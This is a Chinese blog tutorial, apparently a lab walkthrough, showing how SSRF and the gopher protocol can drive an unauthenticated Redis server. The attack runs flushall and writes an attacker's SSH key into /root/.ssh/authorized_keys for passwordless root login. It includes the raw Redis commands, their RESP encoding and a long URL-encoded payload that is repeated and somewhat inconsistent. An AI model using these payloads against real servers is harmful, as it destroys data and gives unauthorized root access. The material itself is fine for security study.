ssrf结合redis写入公钥

已于 2024-07-08 19:48:35 修改
阅读量776 收藏 22
点赞数 25
文章标签: centos linux 运维
于 2024-07-05 11:24:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65540912/article/details/140102124
版权

目录

centos

1、kali生成密钥

2、redis数据库写入公钥

3、通过ssrf进行写入公钥

ubuntu

我这里用了Web-Redis-Lab漏洞环境来演示

攻击机kali:192.168.168.128

目标机:192.168.168.134

centos

1、kali生成密钥

使用ssh-keygen -t rsa生成密钥,id_rsa是私钥,id_rsa.pub是公钥,我们要用的就是公钥

ssh-keygen -t rsa

2、redis数据库写入公钥

将上面kali中的id_rsa.pub的公钥内容取出,通过redis数据库将公钥写入到/root/.ssh下,注意的是,写入的文件名必须是authorized_keys

flushall
set 1 '公钥内容'
config set dir /root/.ssh
config set dbfilename authorized_keys
save

Redis服务器与客户端通过RESP协议通信,所以需要将上面的内容编译为RESR协议的格式:

gopher://127.0.0.1:6379/_*1

$8

flushall

*3

$3

set

$1

1

$567


 

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzM2dS0hJe/04kvRqW8zPSs+T1/XT0hWU+RVvvoSd3QhMhhaMoFLsajUBZ4L3X35Jrp5XrHFGAlIovvFT53L7/Q7ofAzsRaK1nnWU24KJe5Be/xnRNNFEbdz/FE7pmuCHerW5/MR8av9AMNwwtHWP+SEeb8rqBrB72FHQEVce4rBGauiPnmIdC0G7VRCc0zUAJGCK4Q1jBZz70wzQNrENm38DsyweXAs8Q2bntzXGOjgWpSXudqGVOxHYAfft6KwnyV+wtU3wQWGFwgSRfu4qiqx9CYfd9tQubSAuJ+MIqJs9MBauQjJNa+jO+QqSUWoE3CZrzQrQiSgxZWxF4U8sb5ijyaKuLZ3+T1IDcAwx6ecANTgFG1RpwE23ktna/jynqdYdS3JNjFqTSI4fwxqD4y2iP6fFYSOp0nEZLAS7RZxPjU5uSZYr6j3BYz59gtEPQ+mhzwncEqJvVzJd25TT8kcuU2S39mS1oAcxnObrkEqrTZ+ZQPTYFwxbwavnQxMU= root@mykali

*4

$6

config

$3

set

$3

dir

$10

/root/.ssh

*4

$6

config

$3

set

$10

dbfilename

$15

authorized_keys

*1

$4

save

*1

$4

quit

我这里Redis数据库端口映射到了3333端口,由于是本地访问,所以使用127.0.0.1,使用本地默认端口是6379

3、通过ssrf进行写入公钥

我们通过ssrf写入,这是后就需要用到gopher协议。

gopher协议:gopher支持发出GET、POST请求。可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。

在这个实验中,没有在请求头中,所以服务器会进行一次解析,需要用urlcode编码一次

构造payload:

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%24568%0D%0A%0A%0Assh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABgQCzM2dS0hJe/04kvRqW8zPSs%2BT1/XT0hWU%2BRVvvoSd3QhMhhaMoFLsajUBZ4L3X35Jrp5XrHFGAlIovvFT53L7/Q7ofAzsRaK1nnWU24KJe5Be/xnRNNFEbdz/FE7pmuCHerW5/MR8av9AMNwwtHWP%2BSEeb8rqBrB72FHQEVce4rBGauiPnmIdC0G7VRCc0zUAJGCK4Q1jBZz70wzQNrENm38DsyweXAs8Q2bntzXGOjgWpSXudqGVOxHYAfft6KwnyV%2BwtU3wQWGFwgSRfu4qiqx9CYfd9tQubSAuJ%2BMIqJs9MBauQjJNa%2BjO%2BQqSUWoE3CZrzQrQiSgxZWxF4U8sb5ijyaKuLZ3%2BT1IDcAwx6ecANTgFG1RpwE23ktna/jynqdYdS3JNjFqTSI4fwxqD4y2iP6fFYSOp0nEZLAS7RZxPjU5uSZYr6j3BYz59gtEPQ%2BmhzwncEqJvVzJd25TT8kcuU2S39mS1oAcxnObrkEqrTZ%2BZQPTYFwxbwavnQxMU%3D%20root%40mykali%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%246%0D%0A/.ssh/%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%2415%0D%0Aauthorized_keys%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0Agopher://192.168.168.134:3333/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%24568%0D%0A%0A%0Assh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABgQCzM2dS0hJe/04kvRqW8zPSs%2BT1/XT0hWU%2BRVvvoSd3QhMhhaMoFLsajUBZ4L3X35Jrp5XrHFGAlIovvFT53L7/Q7ofAzsRaK1nnWU24KJe5Be/xnRNNFEbdz/FE7pmuCHerW5/MR8av9AMNwwtHWP%2BSEeb8rqBrB72FHQEVce4rBGauiPnmIdC0G7VRCc0zUAJGCK4Q1jBZz70wzQNrENm38DsyweXAs8Q2bntzXGOjgWpSXudqGVOxHYAfft6KwnyV%2BwtU3wQWGFwgSRfu4qiqx9CYfd9tQubSAuJ%2BMIqJs9MBauQjJNa%2BjO%2BQqSUWoE3CZrzQrQiSgxZWxF4U8sb5ijyaKuLZ3%2BT1IDcAwx6ecANTgFG1RpwE23ktna/jynqdYdS3JNjFqTSI4fwxqD4y2iP6fFYSOp0nEZLAS7RZxPjU5uSZYr6j3BYz59gtEPQ%2BmhzwncEqJvVzJd25TT8kcuU2S39mS1oAcxnObrkEqrTZ%2BZQPTYFwxbwavnQxMU%3D%20root%40mykali%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%246%0D%0A/.ssh/%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%2415%0D%0Aauthorized_keys%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0Agopher://192.168.168.134:3333/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%24568%0D%0A%0A%0Assh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABgQCzM2dS0hJe/04kvRqW8zPSs%2BT1/XT0hWU%2BRVvvoSd3QhMhhaMoFLsajUBZ4L3X35Jrp5XrHFGAlIovvFT53L7/Q7ofAzsRaK1nnWU24KJe5Be/xnRNNFEbdz/FE7pmuCHerW5/MR8av9AMNwwtHWP%2BSEeb8rqBrB72FHQEVce4rBGauiPnmIdC0G7VRCc0zUAJGCK4Q1jBZz70wzQNrENm38DsyweXAs8Q2bntzXGOjgWpSXudqGVOxHYAfft6KwnyV%2BwtU3wQWGFwgSRfu4qiqx9CYfd9tQubSAuJ%2BMIqJs9MBauQjJNa%2BjO%2BQqSUWoE3CZrzQrQiSgxZWxF4U8sb5ijyaKuLZ3%2BT1IDcAwx6ecANTgFG1RpwE23ktna/jynqdYdS3JNjFqTSI4fwxqD4y2iP6fFYSOp0nEZLAS7RZxPjU5uSZYr6j3BYz59gtEPQ%2BmhzwncEqJvVzJd25TT8kcuU2S39mS1oAcxnObrkEqrTZ%2BZQPTYFwxbwavnQxMU%3D%20root%40mykali%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%246%0D%0A/.ssh/%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%2415%0D%0Aauthorized_keys%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0Agopher://192.168.168.134:3333/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%24568%0D%0A%0A%0Assh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABgQCzM2dS0hJe/04kvRqW8zPSs%2BT1/XT0hWU%2BRVvvoSd3QhMhhaMoFLsajUBZ4L3X35Jrp5XrHFGAlIovvFT53L7/Q7ofAzsRaK1nnWU24KJe5Be/xnRNNFEbdz/FE7pmuCHerW5/MR8av9AMNwwtHWP%2BSEeb8rqBrB72FHQEVce4rBGauiPnmIdC0G7VRCc0zUAJGCK4Q1jBZz70wzQNrENm38DsyweXAs8Q2bntzXGOjgWpSXudqGVOxHYAfft6KwnyV%2BwtU3wQWGFwgSRfu4qiqx9CYfd9tQubSAuJ%2BMIqJs9MBauQjJNa%2BjO%2BQqSUWoE3CZrzQrQiSgxZWxF4U8sb5ijyaKuLZ3%2BT1IDcAwx6ecANTgFG1RpwE23ktna/jynqdYdS3JNjFqTSI4fwxqD4y2iP6fFYSOp0nEZLAS7RZxPjU5uSZYr6j3BYz59gtEPQ%2BmhzwncEqJvVzJd25TT8kcuU2S39mS1oAcxnObrkEqrTZ%2BZQPTYFwxbwavnQxMU%3D%20root%40mykali%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%246%0D%0A/.ssh/%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%2415%0D%0Aauthorized_keys%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A

发起请求:

可以看到成功写入,公钥已成功写入.ssh中:

在kali机上ssh连接目标机:

可以看见已经可以无密钥登入服务器

ubuntu

在ubuntu中基本和centos写入是一样的,但是可能会出现下面报错:

可能是redis的保护配置,需要将protected-mode关闭,

可以构造一个下面语句的payload试试,

config set protected-mode no

也可能是因为拉取的redis数据库的版本比较高,安全配置比价好。

赵梓鑫
关注
  • 25
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通过SSRF操作Redis主从复制写Webshell_R3start1
08-03
1.使用 DICT 协议添加一条测试记录 2.设置保存路径 3.设置保存文件名 4.保存 1.连接远程主服务器 2.设置保存路径 3.设置保存文件名 4.保存
通过 SSRF 操作 Redis 主从 RCE1
08-04
1.使用 DICT 协议添加一条测试记录 2.设置保存路径 3.设置保存文件名 4.保存 1.连接远程主服务器 2.设置保存路径 3.设置保存文件名 4.保存
redis未授权写入ssh公钥登录
m0_46576302的博客
09-09 3868
利用redis的备份功能,写入ssh公钥
利用网站拿到服务器登录权限,利用Redis写入SSH公钥获取服务器登陆权限
weixin_36156325的博客
08-02 2667
前置条件:1、操作机已安装redis客户端:redis-cli2、已使用ssh-keygen生成用于测试的ssh公钥|私钥(ssh-keygen -t rsa -C "test")操作步骤:1、将之前生成的公钥写入文件中cd~/.ssh/(echo-e"\n\n";catid_rsa.pub;echo-e"\n\n")>hack.txt2、将hack.txt写入靶机Redi...
SSRF+Redis写入公钥
qq_43665434的博客
04-03 3325
野径云俱黑,江船火独明。 实验环境 主机 角色 描述 centos8 受害服务器 运行redis数据库(未授权访问) window10 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrf+redis未授权访问写入公钥登录centos8 实验准备 思路: 先在自己的主机上生成公私钥对,利用redis的数据备份功能,将自己的公钥写入到目标服务器的/etc/authorized_keys中,然后使用ssh的私钥直接登录目标服务器。 条件: 1、redis服务使用root
Xshell工具利用Redis 6379写入SSH公钥漏洞
maple_leaf
05-03 428
本文介绍了如何利用Xshell工具利用Redis 6379端口的漏洞,向目标主机注入SSH公钥
记一次学习过程(redis的编译安装,以及有关redis漏洞的学习,包括redis未授权写入ssh公钥redis写入木马、redis主从复制漏洞linux版)同时记录几个威胁分析平台
最新发布
banliyaoguai的博客
08-03 894
这个东西的流程是你发现了一个网站,然后你扫描对方端口,发现6379端口开着,而且通过一些其他漏洞可以登陆上redis后,你在redis中执行操作获取webshell权限。测试公私钥的时候不要在你的攻击机子和redis的服务器的机子上测试,或者你把测试完成的文件在服务器上删掉,删掉之前记得保存。这个是你冒充redis的主服务器,让redis从服务器下载木马(这里使用工具)这是你已经连接上了redis,你在redis中操作,在redis写入公钥。(下图是测试出现问题的情况,没出现问题的情况忘记截图了)
web中间件漏洞-Redis漏洞未授权访问漏洞-写webshell、写ssh公钥
Alsn86的博客
06-22 357
利用redis未授权访问、攻击机向服务器写入webshell从服务器查看写入的webshell菜刀连接。
Python-GitLab1147SSRF配合redis远程执行代码
08-10
GitLab 11.4.7 SSRF配合redis远程执行代码
redis安全学习小记1
08-03
SSRF(Server-Side Request Forgery)攻击中,攻击者可能利用 `%2A2%0d%0a%244%0d%0aAUTH%0d%0a%246%0d%0a123123%0D%0A`来绕过认证。 Redis支持多种数据类型,包括字符串、哈希、列表、集合和有序集合。这些数据...
SSRF bible. Cheatsheet
08-06
标题 "SSRF bible. Cheatsheet" 和描述 "SSRF bible. Cheatsheet SSRF attack and sockets presentation." 显示了文档的主题为服务器端请求伪造(SSRF)攻击和相关技术的介绍与实践。SSRF是一种网络攻击技术,攻击者...
redis攻防-ssh登录、主从复制、未授权访问、计划任务、写webshell
weixin_46626737的博客
06-30 665
cat key.txt | redis-cli -h 192.168.214.138 --pass(有密码则加,没密码不用) 123456 -x set wang。原理是:利用redis数据库将生成的ssh公钥发送到某一个用户./ssh目录下,然后直接利用ssh的私钥连接即可。主从模式,一个redis机器充当主机,可以进行写数据操作,其他的redis机器充当从机,只可以进行读操作。查看数据库中的内容:keys * (redis数据库没有表,是大量的键值对组成的)3)开启保护模式(protect-mode)
Redis漏洞及搭配ssrf利用的姿势
qq_71467825的博客
06-24 2363
这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!!!
Redis未授权访问配合SSH key的综合利用
hyy615545936的博客
09-11 1553
【实验原理】 利用 Redis 自身的提供的config命令,可以进行写文件操作,恶意访问者可以成功将自己的公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys文件中,进而可以直接使用对应的私钥登录目标服务器。 步骤一:在本地生产公私钥文件 linux系统行使用命令ssh-keygen -t rsa生成本地公钥和私钥文件,输入密码口令;如下其显示成功生成公...
【网络安全】通过Redis2.x实现ssh未授权访问
kinghzking的专栏
08-23 2388
下载redis-server(目标机器,kali):https://pan.baidu.com/s/1I9mByRQjFaNvt040xOm8_w?下载redis-cli(攻击机器,win11):https://pan.baidu.com/s/1qAkZMBUWVWJvU2bpBq_LNQ?redis刚好能满足我们的需求,2.x版本的redis,默认配置,能被外网访问,并完成上面的操作,我们正是利用这个特性,完成。攻击机(win11)上连接目标机(kali)目标机器的redis-server安装和配置。
Redis未授权访问利用
LiuSiXian的博客
07-14 713
Redis服务器:192.168.100.10攻击机:192.168.15.101。
浅谈Linux下的redis攻击
qq_64201116的博客
10-17 5255
redis服务ip:192.168.65.163 (CentOsredis服务ip:192.168.65.158 (Ubuntu)kali攻击机:192.168.65.158。
redis非授权访问漏洞
weixin_43995159的博客
11-29 1231
复现了三种redis未授权登录的场景。 1.通过redis写入计划任务,取得反弹shell。 2.通过redis写入一句话木马,取得shell。 3.通过redis写入ssh公钥,实现ssh无密码连接。
ssrf与redis
04-27
SSRF(Server-Side Request Forgery)是一种安全漏洞,它允许攻击者在服务器端发起网络请求,可能导致敏感信息泄露、服务端请求伪造等问题。而Redis是一种开源的内存数据库,它支持多种数据结构,如字符串、哈希、列表等,并提供了丰富的功能和命令。 SSRF攻击与Redis之间的关联在于,攻击者可以利用SSRF漏洞来发起针对Redis的攻击。具体来说,攻击者可以通过构造恶意请求,将Redis服务器的内部数据暴露给外部,或者通过修改Redis配置文件来实施攻击。 为了防止SSRF与Redis相关的攻击,可以采取以下措施: 1. 输入验证与过滤:对用户输入进行严格的验证和过滤,确保只允许合法的URL访问。 2. 白名单限制:限制服务器端可以访问的URL列表,只允许访问可信任的URL。 3. 限制协议与端口:限制服务器端只能访问特定的协议和端口,避免访问到不安全的服务。 4. 防火墙配置:在服务器上配置防火墙规则,限制对Redis服务的访问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值